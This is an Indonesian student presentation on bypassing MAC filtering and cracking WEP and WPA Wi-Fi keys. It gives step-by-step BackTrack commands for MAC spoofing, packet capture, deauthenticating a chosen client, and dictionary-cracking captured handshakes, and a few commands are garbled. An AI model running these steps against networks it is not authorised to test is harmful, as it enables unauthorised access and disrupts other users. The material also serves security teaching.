Cracking MAC, WEP & WPA
Kelompok 10 1.Yopi Danis Irawan ( ) 2. Budi Purnomo S ( ) 3. Nurirwan Saputra ( ) 4. Willy Wize Ananda( )
Sedikit penjelasan…. MAC Filtering WEP WPA
Perangkat yang digunakan Backtrack 4 : salah satu distro linux (Download: ) Airmon-ng : detect, manage wireless card Airodump-ng : scanning wireless card Aireplay-ng : arp request, flooding Aircrack-ng : decrypt key
Tujuan yang diharapkan 1.Melakukan manipulasi MAC Filtering 2.Cracking WEP key 3.Cracking WPA 4.Penanganan keamanan
Langkah Kerja 1 Manipulasi Mac filtering 1. Wireless Device identifikasi Airmon-ng 2. Menonaktifkan interface wireless card Airmon-ng stop [interfece] 3. Mengganti mac address macchanger --mac 11:22:33:44:55:66 [device] 4. Melihat mac address yang sudah terganti if config -a
Let’s do it Tutorial bisa dilihat di wep-using-backtrack-3/ wep-using-backtrack-3/ kita juga dapat menggunakan aplikasi bernama k-mac untuk memanipulasi mac
Cracking WEP key Aktifkan mode monitor Airmon-ng start [device] Jalankan Airodump-ng (scanning wireless card) airodump-ng --channel X --write nama_file_capture interface Jalankan aireplay (arp request, flooding) aireplay-ng --deauth X –a BSSID_akses_point -c Mac Address target interface Jalankan aircrack-ng (decrypt key) $ aircrack-ng nama_file_capture.cap
Let's crack it! Tutorial bisa dilihat di cracking-wep-using-backtrack-3/
Cracking WPA key 1.Wireless Device identifikasi #airmon-ng 2.Hidupkan Mode Monitor #airmon-ng stop [interface] (menghapus modus monitor) #airmon-ng start [interface] (mulai mode monitor) 3.Siapa yang online? #airodump-ng -w nama_file [interface] 4.Pilih musuh # airodump-ng --channel X --write nama_file_capture [interface] 5.Menunggu Handshake! # aireplay-ng -0 1-a [Ap_Mac]-c [Mac_Client] [interface] 6.Crack kuncinya! # aircrack-ng -0 –x 2 - w Kamus File FILE.cap